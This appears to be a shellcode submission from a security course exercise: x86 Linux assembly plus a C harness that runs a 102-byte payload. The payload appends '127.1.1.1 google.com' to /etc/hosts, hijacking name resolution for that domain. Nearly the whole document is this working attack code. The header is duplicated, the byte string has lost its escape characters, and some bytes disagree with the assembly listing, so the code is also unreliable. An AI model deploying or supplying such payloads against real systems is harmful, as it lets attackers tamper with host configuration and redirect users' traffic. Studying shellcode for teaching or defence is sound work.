# Author: Xenofon Vassilakopoulos
# Date: 2020-06-15
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 # Title: Linux/x86 - Add map in /etc/hosts file polymorphic shellcode ( 102 bytes )
# Author: Xenofon Vassilakopoulos
# Date: 2020-06-15
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 102 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-893.php
# SLAE-ID: SLAE - 1314
# Description: Adding a network map in /etc/hosts file
------------------ ASM ------------------
global _start
section .text
_start:
xor ecx, ecx
xor edx, edx
xor eax, eax
mov DWORD [esp-0x4],ecx
mov DWORD [esp-0x8],0x7374736f
mov DWORD [esp-0xc],0x682f2f2f
mov DWORD [esp-0x10],0x6374652f
sub esp,0x10
mov ebx,esp
mov cx, 0x3b1 ;permmisions
add cx, 0x50
mov al, 0x5
int 0x80 ;syscall to open file
mov ebx, eax
xor eax, eax
jmp short _ldata ;jmp-call-pop technique to load the map
write_data:
pop ecx
mov dl,0x12
add dl,0x3
mov al,0x4
int 0x80
add al,0x2
int 0x80
xor eax,eax
mov al,0x1
int 0x80
_ldata:
call write_data
message db "127.1.1.1 google.com",0x0A
------------------ Shellcode ------------------
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"x31xc9x31xc0x89x4cx24xfcxc7x44x24xf8x6fx73x74x73xc7x44x24"
"xf4x2fx2fx2fx68xc7x44x24xf0x2fx65x74x63x83xecx10x89xe3x66"
"xb9xb1x03x66x83xc1x50xb0x05xcdx80x89xc3x31xc0xebx14x59xb2"
"x12x80xc2x02xb0x04xcdx80x04x02xcdx80x31xc0xb0x01xcdx80xe8"
"xe7xffxffxffx31x32x37x2ex31x2ex31x2ex31x20x67x6fx6fx67x6c"
"x65x2ex63x6fx6dx0ax0d";
int main()
{
printf("Shellcode Length: %d ", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}